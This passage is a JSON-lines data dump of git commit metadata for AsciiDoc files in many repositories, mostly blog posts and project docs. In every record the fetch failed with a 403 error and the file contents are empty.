2017-06-30-C-S-S-Because-tuyu.adoc","message":"Update 2017-06-30-C-S-S-Because-tuyu.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-30-C-S-S-Because-tuyu.adoc","new_file":"_posts\/2017-06-30-C-S-S-Because-tuyu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eaf460d9fa7f7253441777146c1eed99b7afa4bb","subject":"Shorter SO answer URL","message":"Shorter SO answer URL\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Exceptions.adoc","new_file":"Best practices\/Exceptions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca1be6296e2514c555399d36618d22191587f930","subject":"Log insuff","message":"Log insuff\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Exceptions.adoc","new_file":"Best practices\/Exceptions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec2116f8937cd15708aad4b825c04dcb192056b5","subject":"Update 2008-01-01-Test-Post.adoc","message":"Update 2008-01-01-Test-Post.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2008-01-01-Test-Post.adoc","new_file":"_posts\/2008-01-01-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"753c29c3c27839a12852b1f3ccc4c9e6f0e9dcd0","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"452c877c432f7394e86cda1ee19468fcac53e733","subject":"Add documentation","message":"Add documentation\n","repos":"qarea\/jirams,qarea\/jirams","old_file":"doc\/narada-base-tracker-adapter.adoc","new_file":"doc\/narada-base-tracker-adapter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qarea\/jirams.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf95248c377cd499f4314551b1b82ea2b40838f9","subject":"Documents defaultZone case sensitivity","message":"Documents defaultZone case sensitivity\n\nFixes gh-3695\n","repos":"ryanjbaxter\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ryanjbaxter\/spring-cloud-netflix.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dbd1b249000f19ba4e6cc4ac88ef37e9a19839e2","subject":"Update 2016-08-09-xiaocase2.adoc","message":"Update 2016-08-09-xiaocase2.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09-xiaocase2.adoc","new_file":"_posts\/2016-08-09-xiaocase2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"023f14851bcf5bb2a944a2bfd84c22eb7d03c354","subject":"Update 2017-03-25-create-pc.adoc","message":"Update 2017-03-25-create-pc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-25-create-pc.adoc","new_file":"_posts\/2017-03-25-create-pc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3b17ea6706230d32b953320f94e68f23551e639","subject":"Update 2018-07-07-Python-AI.adoc","message":"Update 2018-07-07-Python-AI.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-07-07-Python-AI.adoc","new_file":"_posts\/2018-07-07-Python-AI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7aa202e467d6528eab7655a04e8a426d6831088","subject":"Rough sketch for clustering design doc","message":"Rough sketch for clustering design doc\n","repos":"GaryWKeim\/ehcache3,ehcache\/ehcache3,albinsuresh\/ehcache3,ljacomet\/ehcache3,aurbroszniowski\/ehcache3,rkavanap\/ehcache3,AbfrmBlr\/ehcache3,rkavanap\/ehcache3,albinsuresh\/ehcache3,lorban\/ehcache3,cljohnso\/ehcache3,ehcache\/ehcache3,jhouserizer\/ehcache3,GaryWKeim\/ehcache3,ljacomet\/ehcache3,chrisdennis\/ehcache3,alexsnaps\/ehcache3,aurbroszniowski\/ehcache3,cschanck\/ehcache3,chrisdennis\/ehcache3,henri-tremblay\/ehcache3,AbfrmBlr\/ehcache3,lorban\/ehcache3,jhouserizer\/ehcache3,cljohnso\/ehcache3,cschanck\/ehcache3","old_file":"module.clustering.asciidoc","new_file":"module.clustering.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jhouserizer\/ehcache3.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"20dd2cc66384b6138da306b966b411cdab38d97a","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"287bdd7ece1b4f01da14131f7ed8a6c5f4f322f8","subject":"Update 2015-01-31-Blog-Title.adoc","message":"Update 2015-01-31-Blog-Title.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2015-01-31-Blog-Title.adoc","new_file":"_posts\/2015-01-31-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b0218c2d7a04575573d3778188670aea810254d","subject":"Update 2016-09-01-Quefazeres.adoc","message":"Update 2016-09-01-Quefazeres.adoc","repos":"bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io","old_file":"_posts\/2016-09-01-Quefazeres.adoc","new_file":"_posts\/2016-09-01-Quefazeres.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bretonio\/bretonio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"820368578e6421ea7276c6f18dd62e3b1f684e13","subject":"Update 2017-02-05-First-post.adoc","message":"Update 2017-02-05-First-post.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-02-05-First-post.adoc","new_file":"_posts\/2017-02-05-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8a8a86e8b961d847d2e90ef347d4f4b398e52df","subject":"Update 2017-05-31-Java-types.adoc","message":"Update 2017-05-31-Java-types.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Java-types.adoc","new_file":"_posts\/2017-05-31-Java-types.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08e02d11b332c6b552d5f6c9e14a168cc9388b7c","subject":"Fix formatting (#74)","message":"Fix formatting (#74)\n\nA code fence was indented causing the rest of the document to be rendered incorrectly.","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"java\/chapters\/ch02-basic-concepts.adoc","new_file":"java\/chapters\/ch02-basic-concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"867d4a52d2a983fa86c8979ae25a345525c50c0a","subject":"Update 2015-02-11-fontend-way.adoc","message":"Update 2015-02-11-fontend-way.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"_posts\/2015-02-11-fontend-way.adoc","new_file":"_posts\/2015-02-11-fontend-way.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bc3ce73475a58a42ddc679d0a33ab242072d530","subject":"Update 2018-01-27-Google-Home.adoc","message":"Update 2018-01-27-Google-Home.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-27-Google-Home.adoc","new_file":"_posts\/2018-01-27-Google-Home.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c162db8f85d14cfd50d645333aabdd2cf5451c70","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"865434b3667ee93e5e180906852b1735d9afb067","subject":"Fixed tests and added headers.","message":"Fixed tests and added headers.\n","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/ipython_post_setup.adoc","new_file":"docs\/ipython_post_setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0dba6175f60c2cfccc1596b318ffeaddfb40f962","subject":"CAMEL-12815 - Added iota-component generated doc to docs folder","message":"CAMEL-12815 - Added iota-component generated doc to docs folder\n","repos":"christophd\/camel,tdiesler\/camel,nikhilvibhav\/camel,christophd\/camel,ullgren\/camel,pax95\/camel,davidkarlsen\/camel,cunningt\/camel,pmoerenhout\/camel,tadayosi\/camel,nicolaferraro\/camel,tadayosi\/camel,adessaigne\/camel,pax95\/camel,tdiesler\/camel,zregvart\/camel,cunningt\/camel,adessaigne\/camel,pmoerenhout\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,pax95\/camel,Fabryprog\/camel,apache\/camel,DariusX\/camel,alvinkwekel\/camel,mcollovati\/camel,tadayosi\/camel,christophd\/camel,Fabryprog\/camel,gnodet\/camel,nicolaferraro\/camel,objectiser\/camel,tdiesler\/camel,objectiser\/camel,kevinearls\/camel,zregvart\/camel,tadayosi\/camel,kevinearls\/camel,pax95\/camel,adessaigne\/camel,tadayosi\/camel,kevinearls\/camel,zregvart\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,christophd\/camel,apache\/camel,gnodet\/camel,pmoerenhout\/camel,ullgren\/camel,nikhilvibhav\/camel,mcollovati\/camel,nikhilvibhav\/camel,objectiser\/camel,kevinearls\/camel,christophd\/camel,ullgren\/camel,Fabryprog\/camel,cunningt\/camel,CodeSmell\/camel,davidkarlsen\/camel,tdiesler\/camel,adessaigne\/camel,gnodet\/camel,tdiesler\/camel,Fabryprog\/camel,apache\/camel,adessaigne\/camel,apache\/camel,DariusX\/camel,cunningt\/camel,pmoerenhout\/camel,pmoerenhout\/camel,kevinearls\/camel,objectiser\/camel,ullgren\/camel,CodeSmell\/camel,CodeSmell\/camel,cunningt\/camel,alvinkwekel\/camel,tdiesler\/camel,davidkarlsen\/camel,DariusX\/camel,gnodet\/camel,gnodet\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,pax95\/camel,nicolaferraro\/camel,kevinearls\/camel,alvinkwekel\/camel,adessaigne\/camel,DariusX\/camel,tadayosi\/camel,punkhorn\/camel-upstream,mcollovati\/camel,zregvart\/camel,apache\/camel,pax95\/camel,mcollovati\/camel,christophd\/camel,apache\/camel,alvinkwekel\/camel,cunningt\/camel,pmoerenhout\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/iota-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/iota-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a3cf0bff871411511956a6441552ccb4187cd8f8","subject":"Update 2015-07-02-Ruby-Rack.adoc","message":"Update 2015-07-02-Ruby-Rack.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2015-07-02-Ruby-Rack.adoc","new_file":"_posts\/2015-07-02-Ruby-Rack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"057510ee2ac678ca0a88a3943aa2e176cd0336c1","subject":"Update 2016-02-12-The-start.adoc","message":"Update 2016-02-12-The-start.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-The-start.adoc","new_file":"_posts\/2016-02-12-The-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86a32de25e82045cc045c890c66b62e8c2a2fec5","subject":"add content for rates including resets","message":"add content for rates including resets\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2b88946362a67ceaf06a4796287d71a868d27efb","subject":"Uses the AWS Code of Conduct, resolves #482","message":"Uses the AWS Code of Conduct, resolves #482\n","repos":"arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dalbhanj\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e5c7c00ee4be0c7d1cf238745e5926385527c2e2","subject":"code of conduct","message":"code of conduct\n","repos":"spring-cloud-stream-app-starters\/http","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud-stream-app-starters\/http.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b967d42f8593638748190e778d07a8e618e097f6","subject":"Update versions in doc.","message":"Update versions in doc.\n","repos":"funcool\/cats,tcsavage\/cats","old_file":"doc\/content.adoc","new_file":"doc\/content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcsavage\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"44220fd2202ec65dc4177225fc020e5bc6aea3a7","subject":"Log in","message":"Log in\n","repos":"EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST","old_file":"lab\/lab.adoc","new_file":"lab\/lab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMCWorld\/2015-REST.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8bcbebbf0dc6c2cbedc00a86fa202d6c3cad4d19","subject":"[DOCS] Mention option to return String in sort context (#76105)","message":"[DOCS] Mention option to return String in sort context (#76105)\n\n* Painless: Mention option to return String in sort context\r\n\r\n* Adjust wording","repos":"GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/painless\/painless-contexts\/painless-sort-context.asciidoc","new_file":"docs\/painless\/painless-contexts\/painless-sort-context.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GlenRSmith\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ce355a954ca17900c30160c5214fff4a16d9ee2a","subject":"Adding webinar recording to the blog","message":"Adding webinar recording to the blog\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-02-13-debezium-webinar-at-devnation-live.adoc","new_file":"blog\/2019-02-13-debezium-webinar-at-devnation-live.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"863975558afaabc4ddfcafcd07db48bf6a8ff35e","subject":"Update 2016-04-28-First-post.adoc","message":"Update 2016-04-28-First-post.adoc","repos":"grzrobak\/grzrobak.github.io,grzrobak\/grzrobak.github.io,grzrobak\/grzrobak.github.io,grzrobak\/grzrobak.github.io","old_file":"_posts\/2016-04-28-First-post.adoc","new_file":"_posts\/2016-04-28-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grzrobak\/grzrobak.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa4f2093eaa981ea27d1bd1a522513ada070d885","subject":"Updt deps","message":"Updt deps\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"WS client\/JAX-RS client.adoc","new_file":"WS client\/JAX-RS client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51ed9532f4cf476e4c7d34ed0f63bfe90defdb70","subject":"Update 2016-07-20-Latency-for-a-set-Throughput.adoc","message":"Update 2016-07-20-Latency-for-a-set-Throughput.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-07-20-Latency-for-a-set-Throughput.adoc","new_file":"_posts\/2016-07-20-Latency-for-a-set-Throughput.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1fd8b66c57296ea0a8f93b7dcc9ae5b4d83618dc","subject":"Update 2017-07-28-mecab.adoc","message":"Update 2017-07-28-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-mecab.adoc","new_file":"_posts\/2017-07-28-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60deddd5880a92fd66332fd1ed5f27893e5c7ed6","subject":"Update 2017-08-05-mecab.adoc","message":"Update 2017-08-05-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-mecab.adoc","new_file":"_posts\/2017-08-05-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85c95af7cc12f9bc0623473e586bd5a596170e4d","subject":"added a paragraph on signing","message":"added a paragraph on signing\n","repos":"markllama\/Fedora-rktfiles,markllama\/Fedora-rktfiles","old_file":"bashtest\/README.adoc","new_file":"bashtest\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/Fedora-rktfiles.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"da3c3fef15025616d22557efad53e93c98a9aeb1","subject":"Publish 2016-12-1-There-was-a-keynote-lecture.adoc","message":"Publish 2016-12-1-There-was-a-keynote-lecture.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-1-There-was-a-keynote-lecture.adoc","new_file":"2016-12-1-There-was-a-keynote-lecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"484a697093e8dfae091a85a5a9f6d3406e2e3ee9","subject":"Update 2018-02-27-When-the-RTFM-sucks.adoc","message":"Update 2018-02-27-When-the-RTFM-sucks.adoc","repos":"costalfy\/costalfy.github.io,costalfy\/costalfy.github.io,costalfy\/costalfy.github.io,costalfy\/costalfy.github.io","old_file":"_posts\/2018-02-27-When-the-RTFM-sucks.adoc","new_file":"_posts\/2018-02-27-When-the-RTFM-sucks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/costalfy\/costalfy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d44528c6154b48006e8518b113941dec213224c","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8722f8d586a550b4683e5b168084f4cf0f2a4ec","subject":"Update 2015-04-20-Git-Introduction.adoc","message":"Update 2015-04-20-Git-Introduction.adoc","repos":"rh0\/the-myriad-path,rh0\/the-myriad-path,rh0\/the-myriad-path","old_file":"_posts\/2015-04-20-Git-Introduction.adoc","new_file":"_posts\/2015-04-20-Git-Introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rh0\/the-myriad-path.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20a97a4a5d23515d040a2264625e8bf71a3db0f0","subject":"Update 2016-06-18-Non-secure-icons.adoc","message":"Update 2016-06-18-Non-secure-icons.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2016-06-18-Non-secure-icons.adoc","new_file":"_posts\/2016-06-18-Non-secure-icons.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8fdeb242b47980833a4ac3b2e3c26b4c5fc439cc","subject":"Update 2016-03-30-Subiendo-el-exploit.adoc","message":"Update 2016-03-30-Subiendo-el-exploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b09879601b8e375d0a8e77cc929a4ae8d41dc4b","subject":"Update 2016-12-30-Kleptography-in-RSA.adoc","message":"Update 2016-12-30-Kleptography-in-RSA.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3182b03de1620342dc78470c04ceea23db62cd43","subject":"Update 2017-02-17-First-Hubpress-Blog.adoc","message":"Update 